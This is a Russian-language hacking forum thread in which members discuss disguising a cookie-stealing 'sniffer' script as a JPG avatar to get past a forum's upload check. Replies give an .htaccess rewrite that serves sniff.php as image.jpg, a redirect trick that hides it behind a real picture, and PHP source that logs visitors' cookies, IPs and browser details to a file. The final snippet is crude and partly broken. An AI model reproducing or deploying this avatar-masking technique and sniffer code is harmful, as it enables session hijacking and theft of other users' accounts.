Sniffer

Discussion in 'Уязвимости' started by CTTAPTAK, 1 Jan 2006.

  1. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    как сделать чтоб аплоадеры распоновали скрипт как ЖэПэГэшку с размерами 100*100?
    Именно последнее необходимо потому что форум проверяет аватары на размер :/
     
  2. err0rFrost

    err0rFrost Elder - Старейшина

    Joined:
    31 Mar 2005
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    наверное надо в нете поискать формат .жпг и посмотреть где он там размер проставляет, но не факт наверное что после этого внедрения снифф будет работать
     
  3. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    А у тебя свой сниффер?
     
  4. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    да. создаю блокнот, в нем пишу код который отправляет кукисы на снифак, переименовываю в Jpg.
    размер файла не причем, надо как то сделать чтобы робот принял жэпэнгэшку за картинку с размерами.

    Я хочу понять где указать размеры картинки :/

    Кто заливал на форумы, скажите- как быть то?
     
  5. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Если у тебя свой снифф написанн на PHP, то делай так.

    Тама есть файл .htaccess, напиши тама эту стороку

    RewriteEngine On
    RewriteRule image.jpg sniff.php

    --------------------------------------------------------------------------------------------------

    Потом и в самом снифере : header('Location: image.jpg');
    --------------------------------------------------------------------------------------------------

    Потом бирёш лубой файл с расширением jpg и вставь в туже деректорию где и sniff.php,вот и всё.
     
  6. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    урл пойдет?

    сниф не свой, ачатовский пробывал лан ща свой достану гденидь...
     
  7. murkas

    murkas Member

    Joined:
    14 Dec 2006
    Messages:
    3
    Likes Received:
    7
    Reputations:
    0
    Кто скинет исходник сниффа а то не знаю как самому зделать.....плизз
     
  8. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    ВОт Исходник! Гляди!

    /sniff/source.php
     
  9. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Простой ПХП снифер, без наворотов
    <?php
    if(isset($Query_String))
    {
    $date=date('d.m.y:H:i:s');
    $fp=fopen("./log.txt","a");
    fputs($fp,"Date and time:$date\n IP:$Remote_addr\n Refer: $HttP_refer\n Cookie: Query_String\n Agent:$Http_user_agent\n Host:$Http_host Server:$server_port Script:$SCriptName\n Method: $Request_Method\n");
    fclose($fp);
    }
    ?>